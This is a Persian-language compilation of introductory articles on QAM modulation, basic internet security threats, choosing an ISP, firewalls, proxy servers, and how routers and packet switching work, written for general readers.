QAM ، يک روش مدولاسيون خاص بوده که با توجه به نوع نسخه استفاده شده، باعث triples اطلاعات ارسالی در طول يک خط می گردد. در روش فوق از مدولاسيون ( تغيير شکل موج حامل ) و شيفت فاز ( تغيير زاويه موج حامل ) استفاده می گردد. يک سيگنال unmodulated صرفا" دو حالت صفر و يک را ارائه می دهد. ( در هر سيکل صرفا" يک بيت اطلاعات ارسال خواهد شد ) با ارسال موج دوم که به اندازه 90 درجه شيفت پيدا کرده است ( نسبت به اول ) و مدولاسيون هر يک از امواج ، دو نقطه در هر موج وجود خواهد داشت . ( هشت حالت ممکن ) . بدين ترتيب امکان ارسال سه بيت در هر سيکل بوجود خواهد آمد: داشتن دو وضعيت معادل يک بيت است (2=2¹) ، چهار وضعيت معادل دو بيت (4=2²) و هشت حالت معادل سه بيت است (8=2³) . با افزدون چهار موج و شيفت فاز هر يک به اندازه 15 درجه ، می توان16 حالت متفاوت را ارائه و امکان ارسال 4 بيت در هر سيکل ، فراهم خواهد شد.

قطعا" تاکنون اخبار متعددی را در خصوص سرقت اطلاعات حساس نظير شماره کارت اعتباری و يا شيوع يک ويروس کامپيوتری شنيده ايد و شايد شما نيز از جمله قربانيان اين نوع حملات بوده ايد . آگاهی از تهديدات موجود و عمليات لازم به منظور حفاظت در مقابل آنان ، يکی از روش های مناسب دفاعی است .

اهميت امنيت در اينترنت
بدون شک کامپيوتر و اينترنت در مدت زمان کوتاهی توانسته اند حضور مشهود خود را در تمامی عرصه های حيات بشری به اثبات برسانند . وجود تحولات عظيم در ارتباطات ( نظير Email و تلفن های سلولی ) ، تحولات گسترده در زمينه تجهيزات الکترونيکی و سرگرمی ( کابل ديجيتال ، mp3 ) ، تحولات گسترده در صنعت حمل و نقل ( سيستم هدايت اتوماتيک اتومبيل ، ناوبری هوائی ) ، تغييرات اساسی در روش خريد و فروش کالا ( فروشگاههای online ، کارت های اعتباری ) ، پيشرفت های برجسته در عرصه پزشکی ، صرفا" نمونه هائی اندک در اين زمينه می باشد .
اجازه دهيد به منظور آشنائی با جايگاه کامپيوتر در زندگی انسان عصر حاضر و اهميت امنيت اطلاعات ، اين پرسش ها را مطرح نمائيم که در طی يک روز چه ميزان با کامپيوتر درگير هستيد ؟ چه حجمی از اطلاعات شخصی شما بر روی کامپيوتر خود و يا ساير کامپيوترهای ديگر ، ذخيره شده است ؟ پاسخ به سوالات فوق،جايگاه کامپيوتر و اهميت ايمن سازی اطلاعات در عصر اطلاعات را بخوبی مشخص خواهد کرد .
امنيت در اينترنت ، حفاطت از اطلاعات با استناد به سه اصل اساسی زير است :

• نحوه  پيشگيری از بروز يک تهاجم
• نحوه تشخيص يک تهاجم
• نحوه برخورد با حملات

انواع تهديدات
اينترنت،علیرغم تمامی جنبه های مثبت دارای مجموعه ای گسترده از خطرات و تهديدات امنيتی است که برخی از آنان بسيار جدی و مهم بوده و برخی ديگر از  اهميت کمتری برخوردار می باشند :

• عملکرد ويروس های کامپيوتری که می تواند منجر به حذف اطلاعات موجود بر روی يک کامپيوتر شود .
• نفوذ افراد غير مجاز به کامپيوتر شما و تغيير فايل ها
• استفاده از کامپيوتر شما برای تهاجم عليه ديگران
• سرقت اطلاعات حساس نظير شماره کارت اعتباری و خريد غير مجاز با استفاده از آن

با رعايت برخی نکات می توان احتمال بروز و يا موفقيت اين نوع از حملات را به حداقل مقدار خود رساند .

نحوه حفاظت
اولين مرحله به منظور حفاظت و ايمن سازی اطلاعات ، شناخت تهديدات و آگاهی لازم در خصوص برخی مفاهيم اوليه در خصوص  ايمن سازی اطلاعات است .

• Hacker ,attacker و يا Inruder . اسامی فوق به افرادی که همواره در صدد استفاده از نقاط ضعف و آسيب پذير موجود در نرم افزارها می باشند ، اطلاق می گردد . با اين که در برخی حالات ممکن است افراد فوق اهداف غير مخربی را نداشتهو انگيزه آنان صرفا" کنجکاوی باشد، ماحصل عمليات آنان می تواند اثرات جانبی منفی را به دنبال داشته باشد .
• کد مخرب : اين نوع کدها شامل ويروس ها ، کرم ها و برنامه های تروجان ( Trojan ) بوده که هر يک از آنان دارای ويژگی های منحصر بفردی می باشند :

□ ويروس ها ، نوع خاصی از کدهای مخرب می باشند که شما را ملزم می نمايند به منظور آلودگی سيستم ، عمليات خاصی را انجام دهيد . اين نوع از برنامه ها به منظور نيل به اهداف مخرب خود نيازمند ياری کاربران می باشند . باز نمودن يک فايل ضميمه همراه Email و يا مشاهده يک صفحه وب خاص ، نمونه هائی از همکاری کاربران در جهت گسترش اين نوع از کدهای مخرب است .

□ کرم ها : اين نوع از کدهای مخرب  بدون نياز به دخالت کاربر ، توزيع و گسترش می يابند . کرم ها ، عموما" با سوء استفاده از يک نقظه آسيب پذير در نرم افزار فعاليت خود را آغاز نموده و  سعی می نمايند که کامپيوتر هدف را آلوده نمايند . پس از آلودگی يک کامپيوتر ، تلاش برای يافتن و آلودگی ساير کامپيوتر انجام خواهد شد . همانند ويروس های کامپيوتری ، کرم ها نيز می توانند از طريق Email ، وب سايت ها و يا نرم افزارهای مبتنی بر شبکه ، توزيع و گسترش يابند . توزيع اتوماتيک کرم ها نسبت به ويروس ها يکی از  تفاوت های محسوس بين اين دو نوع کد مخرب ، محسوب می گردد .

□ برنامه های تروجان :  اين نوع از کدهای مخرب ، نرم افزارهائی می باشند که ادعای ارائه خدماتی را داشته ولی در عمل،  اهداف خاص خود را دنبال می نمايند . ( تفاوت در حرف و عمل  ) . مثلا" برنامه ای  که ادعای افزايش سرعت کامپيوتر شما را می نمايد ،ممکن است در عمل اطلاعات حساس موجود برروی کامپيوتر شما  را برای يک مهاجم و يا سارق از راه دور ، ارسال نمايد .

برای آشنائی با جايگاه امنيت در اينترنت و انجام عمليات لازم به منظور افزايش ضريب حفاظتی سيستم ، مطالعه مقالات زير توصيه می گردد :

• آشنائی با حملات DoS

مراکز ارائه دهنده خدمات اينترنت ( ISP ) ، خدمات متعددی نظير پست الکترونيکی و دستيابی به اينترنت را در اختيار متقاضيان قرار می دهند . در زمان انتخاب يک ISP می بايست فاکتورهای متعددی را بررسی نمود . امنيت ، نوع و کيفيت سرويس های ارائه شده و قيمت ارائه خدمات از جمله فاکتورهای مهم در زمان انتخاب يک ISP است.

ISP چيست ؟
يک ISP و يا Internet Service Provider ، شرکتی است که امکان دستيابی به اينترنت و ساير سرويس های وب را فراهم می نمايد . مراکز ارائه دهنده خدمات اينترنت  علاوه بر نگهداری و پشتيبانی از يک خط مستقيم به اينترنت ، فعاليت های متعدد ديگری نظير نگهداری و پشتيانی از سرويس دهندگان وب را نيز انجام می دهند . مراکز فوق با ارائه نرم افزارهای لازم ( در صورت ضرورت )  ، يک رمز عبور حفاظت شده و يک شماره تلفن برای تماس با شبکه ، امکان استفاده از اينترنت و مبادله نامه های الکترونيکی را در اختيار متقاضيان قرار می دهند . برخی از مراکز ISP خدمات اضافه ديگری را نيز ارائه می نمايند .
مراکز ISP دارای ابعاد و اندازه های متفاوتی می باشند . برخی از آنان توسط افرادی اندک اداره می شوند و تعدادی ديگر شرکت هائی بزرگ می باشند که خدمات متنوعی را در اختيار کاربران قرار می دهند . مراکز ارائه دهند خدمات اينترنت دارای حوزه های عملياتی متفاوتی نيز می باشند . مثلا" برخی از آنان خدمات خود را صرفا" در سطح يک شهرستان ارائه داده  و برخی ديگر دارای قابليت های منطقه ای و حتی بين المللی می باشند .

مراکز ISP چه سرويس هائی را ارائه می دهند ؟
همانگونه که اشاره گرديد ، خدماتی که توسط مراکز ارائه دهنده خدمات اينترنت ارائه می گردد بسيار متنوع و در عين حال متفاوت است :

• تقريبا" تمامی مراکز ارائه دهنده خدمات اينترنت ، سرويس هائی نظير پست الکترونيکی و استفاده از اينترنت را ارائه می نمايند .
• نوع و کيفيت ارائه خدمات و پشتيبانی فنی توسط مراکز ارائه دهنده خدمات اينترنت دارای سطوح متفاوتی است .
• اکثر مراکز ISP ، سرويس هاستينگ وب را نيز ارائه می نمايند. با استفاده از سرويس فوق ، متقاضيان می توانند صفحات وب شخصی خود را ايجاد و از آنان نگهداری نمايند . اختصاص فضای لازم به منظور ذخيره سازی اطلاعات از جمله وظايف يک ISP در اين رابطه است .
• برخی از مراکز ارائه دهنده خدمات اينترنت سرويس هائی را به منظور طراحی و پياده سازی صفحات وب ارائه می نمايند .
• تعدادی از مراکز ISP گزينه های متفاوتی را در ارتباط با نوع دستيابی به اينترنت در اختيار متقاضيان قرار می دهند . ( Dial-up ، DSL ، مودم های کابلی ). برخی از مراکز ISP امکان دستيابی به اينترنت را صرفا" از طريق خطوط معمولی تلفن فراهم می نمايند .
• اکثر مراکز ISP عمليات متفاوتی نظير تهيه Backup از نامه های الکترونيکی و فايل های وب را نيز انجام می دهند . در صورتی که بازيافت نامه های الکترونيکی و فايل های وب برای شما مهم است ( در صورت بروز اشکال )، يک ISP را انتخاب نمائيد که Backup گرفتن از داده ها را در دستور کار خود قرار داده است .

چگونه يک ISP را انتخاب نمائيم ؟
برای انتخاب يک ISP پارامترهای متعددی بررسی می گردد :

• امنيت : آيا ISP انتخابی از رويکردهای مناسب امنيتی در جهت حفاظت اطلاعات استفاده می نمايد ؟ آيا از رمزنگاری و SSL به منظور حفاظت اطلاعات ارسالی شما نظير نام و رمز عبور استفاده می گردد ؟
• محرمانگی : آيا ISP انتخابی دارای يک سياست تعريف شده در خصوص رعايت حريم خصوصی کاربران است ؟ آيا خيال شما از اين بابت راحت است که چه افرادی به اطلاعات شما دستيابی دارند ؟ نحوه برخورد و استفاده آنان از اطلاعات به چه صورت است ؟
• سرويس ها : آيا ISP انتخابی سرويس های مورد نظر شما را ارائه می نمايد ؟ آيا سرويس های ارائه شده تامين کننده نياز شما می باشند ؟ آيا پشتيبانی لازم به منظور ارائه سرويس ها در اختيار شما گذاشته می شود ؟
• قيمت : آيا قيمت ارائه خدمات توسط ISP قابل قبول است ؟ آيا قيمت ارائه شده با توجه به تعداد و نوع سرويس های ارائه شده، منطقی است؟ آيا به منظور دريافت خدمات ارزان تر ، از کيفيت و امنيت چشم پوشی می نمائيد ؟
• اعمتاد پذيری : آيا به سرويس های ارائه شده توسط ISP انتخابی می توان اعتماد داشت و يا در اغلب موارد سرويس های مورد نظر به دلايل متفاوتی نظير پشتيبانی و نگهداری ، تعداد زياد کاربران و ... ، غير فعال بوده و عملا" امکان استفاده از آنان وجود ندارد . در صورتی که به دلايل متفاوتی لازم است برخی از سرويس های ارائه شده غير فعال گردند آيا اين موضوع با استفاده از مکانيزم های خاصی به شما اطلاع داده می شود ؟
• پشتيبانی کاربران : آيا ISP انتخابی دارای بخش پشتيبانی کاربران است ؟ نحوه برخورد پرسنل بخش پشتيبانی به چه صورت است ؟ آيا آنان دارای دانش لازم به منظور پاسخگوئی منطقی به سوالات شما می باشند ؟
• سرعت : سرعت اتصال ISP انتخابی به اينترنت چگونه است ؟ آيا اين سرعت به منظور دستيابی شما به نامه های الکترونيکی و استفاده از وب کافی است؟
• کيفيت ارائه خدمات : آيا ISP انتخابی دارای عملکردی مثبت در کارنامه فعاليت خود است و استفاده کنندگانی که قبلا" از خدمات آنان استفاده نموده اند ، از کيفيت ارائه خدمات راضی می باشند ؟

در صورتيکه تاکنون مدت زمان کوتاهی از اينترنت استفاده کرده باشيد و يا در يک اداره  مشغول بکار هستيد که بستر لازم برای دستيابی به اينترنت فراهم شده باشد،  احتمالا" واژه  " فايروال " را  شنيده ايد. مثلا" اغلب گفته می شود که : " در اداره ما امکان استفاده از اين سايت وجود ندارد ، چون سايت فوق را از طريق فايروال بسته اند " .  در صورتيکه از طريق خط تلفن به مرکز ارائه دهنده خدمات اينترنت (ISP) متصل و  از اينترنت استفاده می نمائيد ، امکان استفاده  فايروال توسط ISP مربوطه نيز وجود دارد. امروزه در کشورهائی که دارای خطوط ارتباطی با سرعت بالا نظير DSL و يا مودم های کابلی می باشند ، به کاربران خانگی توصيه می گردد که هر يک از فايروال استفاده نموده و با استقرار لايه فوق بين شبکه داخلی در منزل و اينترنت ، مسائل ايمنی را رعايت نمايند. بدين ترتيب با استفاده از يک فايروال می توان يک شبکه را در مقابل عمليات غير مجاز توسط افراد مجاز و عمليات مجاز توسط افراد غيرمجاز حفاظت کرد.

فايروال چيست ؟

فايروال نرم افزار و يا سخت افزاری است که اطلاعات ارسالی از طريق  اينترنت  به شبکه خصوصی و يا کامپيوتر شخصی را فيلتر می نمايد. اطلاعات فيلترشده ، فرصت توزيع  در شبکه را بدست نخواهند آورد.

فرض کنيد، سازمانی دارای 500 کارمند باشد. سازمان فوق دارای ده ها کامپيوتر بوده که بر روی هر کدام يک کارت شبکه نصب شده و يک شبکه درون سازمانی ( خصوصی ) ايجاد شده است . سازمان فوق دارای يک يا چند خط اختصاصی ( T1 و يا T3 ) برای استفاده از اينترنت است . بدون استفاده از فايروال تمام کامپيوترهای موجود در شبکه داخلی، قادر به ارتباط با هر سايت و هر شخص بر روی اينترنت می باشند. کاربران مربوطه قادر به استفاده از برنامه هائی همچون FTP و يا Telnet بمنظور ارتباط مستقيم با افراد حقوقی و يا حقيقی موجود بر روی اينترنت می باشند. عدم رعايت مسائل ايمنی توسط پرسنل سازمان، می تواند زمينه دستيابی به اطلاعات موجود در شبکه داخلی را برای سارقين و متجاوزان اطلاعاتی اينترنت فراهم نمايد.

زمانيکه در سازمان فوق از فايروال استفاده گردد، وضعيت کاملا"  تغيير خواهد کرد. سازمان مربوطه می تواند برروی هر يک از خطوط ارتباطی اينترنت يک فايروال نصب نمايد.فايروال مجموعه سياست های امنيتی را پياده سازی می نمايد. مثلا" يکی از قوانين فوق می تواند بصورت زير باشد :

- تمام کامپيوترهای موجود در شبکه مجاز به استفاده از اينترنت می باشند ، فقط يک فرد مجاز به استفاده از سرويس FTP است و ساير پرسنل مجاز به استفاده از سرويس فوق نخواهند بود.

يک سازمان می تواند برای هر يک از سرويس دهندگان خود ( وب ، FTP،  Telnet و ... ) قوانين مشابه تعريف نمايد. سازمان قادر به کنترل پرسنل  بهمراه  ليست سايت های مشاهده  خواهد بود.  با استفاده از  فايروال يک سازمان قادر به کنترل کاربران شبکه  خواهد بود .

فايروال ها بمنظور کنترل ترافيک يک شبکه از روش های زير استفاده می نمايند:

- فيلتر نمودن بسته های اطلاعاتی . بسته های اطلاعاتی با استفاده ازتعدادی فيلتر، آناليز خواهند شد. بسته هائی که از آناليز فوق سربلند بيرون  آيند از فايروال عبور داده شده و  بسته ها ئی  که شرايط لازم را برای عبور از فايروال را نداشته باشند دور انداخته شده و از فايروال عبور نخواهند کرد.

- سرويس Proxy . اطلاعات درخواستی از طريق اينترنت توسط فايروال بازيابی و در ادامه در اختيار  درخواست کننده گذاشته خواهد شد. وضعيت فوق در موارديکه کامپيوتر موجود در شبکه داخلی، قصد ارسال  اطلاعاتی را برای خارج از شبکه خصوصی  داشته باشند ، نيز صدق می کند.

بهينه سازی استفاده از فايروال

فايروال ها را می توان با توجه به اهداف سازمانی بصورت کاملا" سفارشی نصب و پيکربندی کرد. در اين راستا امکان اضافه  و يا حذف فيلترهای متعدد بر اساس شرايط متفاوت وجود خواهد داشت  :

- آدرس های IP . هر ماشين بر روی اينترنت دارای يک آدرس منحصر بفرد با نام IP است . IP يک عدد 32 بيتی بوده که بصورت چهار عدد دهدهی که توسط نقظه از هم جدا می گردند نمايش داده می شود (Octet) . در صورتيکه يک آدرس IP خارج از شبکه، فايل های زيادی را از سرويس دهنده می خواند ( ترافيک و حجم عمليات سرويس دهنده را افزايش خواهد داد) فايروال می تواند ترافيک از مبداء آدرس فوق و يا به مقصد آدرس فوق را بلاک نمايد.

- اسامی دامنه ها ( حوزه ) . تمام سرويس دهندگان بر روی اينترنت دارای اسامی منحصر بفرد با نام " اسامی حوزه"  می باشند. يک سازمان می تواند با استفاده از فايروال، دستيابی به سايت هائی را غيرممکن  و يا صرفا" امکان استفاده از يک سايت خاص را برای پرسنل خود فراهم نمايد.

- پروتکل ها . پروتکل نحوه گفتگوی بين سرويس دهنده و سرويس گيرنده را مشخص می نمايد . پروتکل های متعدد با توجه به اهداف گوناگون در اينترنت استفاده می گردد. مثلا"  http  پروتکل وب و Ftp پروتکل مربوط به دريافت و يا ارسال فايل ها است . با استفاده از فايروال می توان، ميدان  فيلتر نمودن را  بر روی  پروتکل ها متمرکز کرد.   برخی از پروتکل های رايج که می توان بر روی آنها فيلتر اعمال نمود بشرح زير می باشند :

• § IP)Internet Protocol) پروتکل اصلی برای عرضه اطلاعات بر روی اينترنت است .
• § TCP)Transport Control Protocol ) مسئوليت تقسيم يک بسته اطلاعاتی به بخش های کوچکتر را دارد.
• § HTTP)Hyper Text Transfer Protocol) . پروتکل فوق برای عرضه اطلاعات در وب است.
• § FTP)File Transfer Protocol) . پروتکل فوق برای دريافت و ارسال فايل ها استفاده می گردد.
• § UDP)User Datagram Protocol) . از پروتکل فوق برای اطلاعاتی که به پاسخ نياز ندارند استفاده می شود( پخش صوت و تصوير)
• § ICMP)Internet control Message Protocol). پروتکل فوق توسط روترها و بمنظور تبادل اطلاعات فی المابين استفاده می شود.
• § SMTP)Simple Mail Transfer Protocol) . از پروتکل فوق برای ارسال e-mail استفاده می گردد.
• § SNMP)Simple Network Management Protocol).از پروتکل فوق بمنظور اخذ اطلاعات از يک کامپيوتر راه دور استفاده ميشود
• § Telnet . برای اجرای دستورات بر روی يک کامپيوتر از راه دور استفاده می گردد.

- پورت ها . هر سرويس دهنده ، خدمات مورد نظر خود را با استفاده از پورت های شماره گذاری شده بر روی اينترنت ارائه می دهد. مثلا" سرويس دهنده وب اغلب از پورت 80 و سرويس دهنده Ftp از پورت 21 استفاده می نمايد.  يک سازمان ممکن است با استفاده از فايروال امکان دستيابی به پورت 21 را بلاک نمايد.

- کلمات و عبارات خاص . می توان با استفاده از فايروال کلمات و يا عباراتی را مشخص نمود تا امکان کنترل بسته های اطلاعاتی حاوی کلمات و عبارات فراهم گردد. هر بسته اطلاعاتی  که حاوی  کلمات مشخص شده  باشد  توسط فايروال بلاک خواهد شد.

همانگونه که اشاره شد فايروال ها به  دو صورت نرم افزاری وسخت افزاری استفاده می گردند.فايروال های نرم افزاری بر روی کامپيوتری نصب می گردند که خط اينترنت به آنها متصل است .کامپيوتر فوق بمنزله يک Gateway رفتار می نمايد چون تنها نقطه قابل تماس، بمنظور ارتباط کامپيوتر و اينترنت است . زمانيکه فايروال بصورت سخت افزاری در نظر گرفته شود ، تمام بخش فوق بصورت Gateway خواهد بود.  امنيت فايروال های سخت افزاری بمراتب بيشتر از فايروال های نرم افزاری است .

تهد يدات

حمله کنندگان به شبکه های کامپيوتری از روش های متعددی استفاده می نمايند.

- Remote Login .  امکان برقراری ارتباط با کامپيوتر و کنترل آن توسط فرد غيرمجاز است .  دامنه عمليات فوق می تواند از مشاهده و دستيابی به برخی از فايل ها تا اجرای برخی برنامه ها بر روی کامپيوتر باشد.

-Application Backdoors . برخی از برنامه ها دارای امکانات ويژه ای برای دستيابی از راه دور می باشند. برخی ديگر از برنامه ها دارای اشکالاتی بوده بگونه ای که يک Backdoor را ايجاد و يا امکان دستيابی مخفی را ارائه می دهند. در هر حالت امکان کنترل برنامه فراهم خواهد گرديد.

- SMTP session hijacking . پروتکل SMTP رايج ترين روش برای ارسال e-mail است . با دستيابی به ليستی از آدرس های e-mail ، يک شخص قادر به ارسال e-mail به هزاران کاربر ديگر خواهد شد.

- اشکالات سيستم های عامل . سيستم های عامل نظير ساير برنامه های کاربردی ممکن است دارای Backdoors باشند.

- انفجار E-mail . يک شخص قادر به ارسال صدها و هزاران e-mail مشابه در مقاطع زمانی متفاوت است . با توجه به وضعيت فوق سيستم پست الکترونيکی قادر به دريافت تمام نامه های ارسالی نخواهد بود.

- ماکرو. اغلب برنامه های کاربردی اين امکان را برای کاربران خود فراهم می نمايند که مجموعه ای از اسکريپت ها را بمنظور انجام عمليات خاصی نوشته و نرم افزار مربوطه آنها را اجراء نمايد. اسکريپت های فوق " ماکرو " ناميده می شوند. حمله کنندگان به شبکه های کامپيوتری با آگاهی از واقعيت فوق، اقدام به ايجاد اسکريپت های خاص خود نموده که با توجه به نوع برنامه ممکن است داده ها را حذف  و يا باعث از کار افتادن کامپيوتر گردند.

- ويروس . رايج ترين روش جهت آسيب رساندن به اطلاعات، ويروس است . ويروس يک برنامه کوجک است که قادر به تکثير خود بر روی کامپيوتر ديگر است . عملکرد ويروس ها بسيار متفاوت بوده و از اعلام يک پيام ساده  تا حذف تمام داده ها  را می تواند شامل گردد.

سرويس دهنده Proxy

سرويس دهنده Proxy اغلب با يک فايروال ترکيب می گردد. سرويس دهنده Proxy بمنظور دستيابی به صفحات وب توسط ساير کامپيوترها استفاده می گردد. زمانيکه  کامپيوتری درخواست يک صفحه وب را می نمايد،  صفحه مورد نظر توسط سرويس دهنده Proxy بازيابی و در ادامه برای کامپيوتر متقاضی ارسال خواهد شد. بدين ترتيب تمام ترافيک ( درخواست و پاسخ ) بين درخواست کننده يک صفحه وب و پاسخ دهنده از طريق سرويس دهنده Proxy انجام می گيرد.

سرويس دهنده Proxy می تواند کارائی استفاده از اينترنت را افزايش دهد. پس از دستيابی  به يک صفحه وب ،  صفحه فوق بر روی سرويس دهنده Proxy  نيز ذخيره (Cache) می گردد. در صورتيکه در آينده قصد استفاده از صفحه فوق را داشته باشيد  صفحه مورد نظر از روی سرويس دهنده Proxy در اختيار شما گذاشته می شود( الزامی به برقراری ارتباط مجدد و درخواست صفحه مورد نظر نخواهد بود)

اينترنت يکی از شاهکارهای بشريت در زمينه ارتباطات است . با ايجاد زير ساخت مناسب ارتباطی ، کاربران موجود در اقصی نقاط دنيا قادر به ارسال نامه های الکترونيکی ،  مشاهده صفحات وب ، ارسال و دريافت فايل های اطلاعاتی در کمتر از چند ثانيه  می باشند. شبکه ارتباطی موجود با بکارگيری انواع تجهيزات مخابراتی، سخت افزاری و نرم افزاری ، زير ساخت مناسب ارتباطی را برای عموم کاربران اينترنت فراهم آورده است . يکی از عناصر اصلی و مهم که شايد اغلب کاربران اينترنت آن را تاکنون مشاهده ننموده اند ، روتر است . روترها کامپيوترهای خاصی هستند که پيام های اطلاعاتی کاربران را با استفاده از هزاران مسير موجود به مقاصد مورد نظر هدايت می نمايند.

نحوه ارسال پيام

برای شناخت عملکرد روترها در اينترنت با يک مثال ساده شروع می نمائيم . زمانيکه برای يکی از دوستان خود ، يک E-mail را ارسال می داريد ، پيام فوق به چه صورت توسط دوست شما دريافت می گردد ؟ نحوه مسير يابی پيام فوق به چه صورت انجام می گيرد که فقط کامپيوتر دوست شما در ميان ميليون ها کامپيوتر موجود در دنيا ، آن را دريافت خواهد کرد. ؟ اکثر عمليات مربوط به ارسال يک پيام توسط  کامپيوتر فرستنده  و دريافت آن توسط کامپيوتر گيرنده ، توسط روتر انجام می گيرد.روترها  دستگاههای خاصی می باشند  که امکان حرکت پيام ها در طول شبکه را فراهم می نمايند.

بمنظور آگاهی از عملکرد روتر ، سازمانی را در نظر بگيريد که دارای يک شبکه داخلی و اختصاصی خود است . کارکنان سازمان فوق  هر يک با توجه به نوع کار خود از شبکه استفاده می نمايند. در سازمان فوق تعدادی گرافيست کامپيوتری مشغول بکار هستند که بکمک کامپيوتر طرح های مورد نظر را طراحی می نمايند. زمانيکه يک گرافيست فايلی را از طريق شبکه برای همکار خود ارسال می دارد ، بدليل حجم بالای فايل ارسالی ، اکثر ظرفيت شبکه اشغال  و بدنبال آن برای ساير کاربران ، شبکه کند خواهد شد. علت فوق ( تاثير عملکرد يک کاربر بر تمام عملکرد شبکه برای ساير کاربران ) به ماهيت شبکه های اترنت برمی گردد. در شبکه های فوق هر بسته اطلاعاتی که توسط کاربری ارسال می گردد ، برای تمام کامپيوترهای موجود در شبکه نيز ارسال خواهد شد. هر کامپيوتر آدرس بسته اطلاعاتی دريافت شده را بمنظور آگاهی از مقصد بسته اطلاعاتی بررسی خواهد کرد. رويکرد فوق در رفتار شبکه های اترنت ، طراحی و پياده سازی آنان را ساده می نمايد ولی همزمان با گسترش شبکه و افزايش عمليات مورد انتظار ،  کارآئی شبکه کاهش پيدا خواهد کرد. سازمان مورد نظر ( در مثال فوق ) برای حل مشکل فوق تصميم به ايجاد دو شبکه مجزا می گيرد. يک شبکه برای گرافيست ها ايجاد و شبکه دوم برای ساير کاربران سازمان در نظر گرفته می شود. بمنظور ارتباط دو شبکه فوق بيکديگر و اينترنت از يکدستگاه روتر استفاده می گردد.

روتر، تنها دستگاه موجود در شبکه است  که تمام پيامهای ارسالی توسط کامپيوترهای  موجود در شبکه های سازمان  ، را مشاهده می نمايد.   زمانيکه يک گرافيست، فايلی با ظرفيت بالا را برای گرافيست ديگری ارسال می دارد ، روتر  آدرس دريافت کننده  فايل را بررسی و با توجه به اينکه فايل مورد نظر مربوط به شبکه گرافيست ها در سازمان است ، اطلاعات را بسمت شبکه فوق هدايت خواهد کرد. در صورتيکه يک گرافيست اطلاعاتی را برای يکی از پرسنل شاغل در بخش مالی سازمان ارسال دارد ، روتر با بررسی آدرس مقصد بسته اطلاعاتی به اين نکنه پی خواهد برد که پيام فوق را می بايست به شبکه ديگر انتقال دهد. بدين ترتيب روتر قادر به مسيريابی صحيح يک بسته اطلاعاتی و هدايت آن به شبکه مورد نظر شده است .

يکی از ابزارهائی که روتر از آن برای تعيين مقصد يک بسته اطلاعاتی استفاده می نمايد ،  " جدول پيکربندی " است . جدول فوق شامل مجموعه اطلاعاتی بشرح ذيل است :

• § اطلاعاتی در رابطه با نحوه هدايت اتصالات به آدرس های مورد نظر
• § اولويت های تعريف شده برای هر اتصال
• § قوانين مربوط به تبين ترافيک در حالت طبيعی وشرايط خاص

جدول فوق می تواند ساده ويا شامل صدها خط برنامه در يک روترهای کوچک باشد. در روترهای بزرگ جدول فوق پيچيده تر بوده بگونه ای که قادر به عمليات مسيريابی در اينترنت باشند.  يک روتر دارای دو وظيفه اصلی است :

• § تضمين عدم ارسال اطلاعات به محلی که به آنها نياز نيست
• § تضمين ارسال اطلاعات به مقصد صحيح

با توجه به وظايف اساسی فوق ، مناسبترين محل استفاده از يک روتر، اتصال  دو شبکه است . با اتصال  دو شبکه توسط روتر ، اطلاعات موجود در يک شبکه قادر به ارسال در شبکه ديگر و بالعکس خواهند بود. در برخی موارد ترجمه های لازم با توجه به پروتکل های استفاده شده در هريک از شبکه ها ، نيز توسط روتر انجام خواهد شد. روتر شبکه ها را در مقابل يکديگر حفاظت و از ترافيک غيرضروری پيشگيری می نمايد.( تاثير ترافيک موجود در يک شبکه بر شبکه ديگر با فرض غير لازم بودن اطلاعات حاصل از ترافيک در شبکه اول برای شبکه دوم )  . همزمان با گسترش شبکه ، جدول پيکربندی نيز رشد و توان پردازنده روتر نيز می بايست افزايش يابد. صرفنظر از تعداد شبکه هائی که به يک روتر متصل می باشند ، نوع و نحوه انجام عمليات در تمامی روترها مشابه است . اينترنت بعنوان بزرگترين شبکه کامپيوتری از هزاران شبکه کوچکتر تشکيل شده است. روترها در اتصال شبکه های کوچکتر در اينترنت دارای نقشی اساسی و ضروری می باشند.

ارسال بسته های اطلاعاتی

زمانيکه از طريق تلفن با شخصی تماسی برقرار می گردد ، سيستم تلفن، يک مدار پايدار بين تماس گيرنده و شخص مورد نظر ايجاد می نمايد. مدار ايجاد شده می بايست مراحل  متفاوتی را با استفاده  از کابل های مسی ، سوئيچ ها ،  فيبر های نوری ، ماکروويو و ماهواره  انجام دهد. تمام مراحل مورد نظر بمنظور برپاسازی يک ارتباط پايدار بين تماس گيرنده و مخاطب مورد نظر در مدت زمان تماس ، ثابت خواهند بود. کيفيت خط ارتباطی مشروط به عدم بروز مشکلات فنی و غيرفنی در هر يک از تجهيزات اشاره شده ، در مدت برقراری  تماس ثابت خواهد بود. با بروز هر گونه اشکال نظير خرابی يک سوئيچ و .. خط ارتباطی  ايجاد شده با مشکل مواجه خواهد شد.

اطلاعات موجود در اينترنت ( صفحات وب ، پيام های الکترونيکی و ... ) با استفاده از سيستمی با نام Packet -switching network به حرکت در می آيند. در سيستم فوق ، داده های موجود در يک پيام و يا يک فايل به بسته های 1500 بايتی تقسيم می گردند.هر يک از بسته های فوق شامل اطلاعات مربوط به : آدرس فرستنده ، آدرس گيرنده ، موقعيت  بسته در  پيام  و بررسی ارسال درست اطلاعات توسط گيرنده است. هر يک از بسته های فوق را Packet می گويند. در ادامه بسته های فوق با استفاده از بهترين و مناسبترين مسير برای مقصد ارسال خواهند شد. عمليات فوق در مقايسه با سيستم استفاده شده در تلفن پيچيده تر بنظر می آيد ، ولی در يک شبکه مبتنی بر داده دودليل ( مزيت) عمده برای استفاده از تکنولوژی Packet switching وجود دارد :

• § شبکه قادر به تنظيم لود موجود بر روی هر يک از دستگاهها با سرعت بالا است( ميلی ثانيه )
• § در صورت وجود اشکال در يک دستگاه ، بسته اطلاعاتی از مسير ديگر عبور داده شده تا به مقصد برسد.

روترها که بخش اصلی شبکه اينترنت را تشکيل می دهند ، قادر به " پيکربندی مجدد مسير " بسته های اطلاعاتی می باشند. در اين راستا شرايط حاکم بر خطوط نظير تاخير در دريافت و ارسال اطلاعات و ترافيک موجود بر روی عناصر متفاوت شبکه بصورت دائم مورد بررسی قرار خواهند گرفت .  روتر دارای اندازه های متفاوت است :

- در صورتيکه از امکان Internet connection sharing بين دو کامپيوتری که بر روی آنها ويندوز 98 نصب شده است استفاده گردد،  يکی از کامپيوترها که خط اينترنت به آن متصل شده است بعنوان يک روتر ساده رفتار می نمايد. در مدل فوق روتر، عمليات ساده ای را انجام می دهد. داده  مورد نظر بررسی تا مقصد آن برای يکی از دو کامپيوتر تعيين گردد.

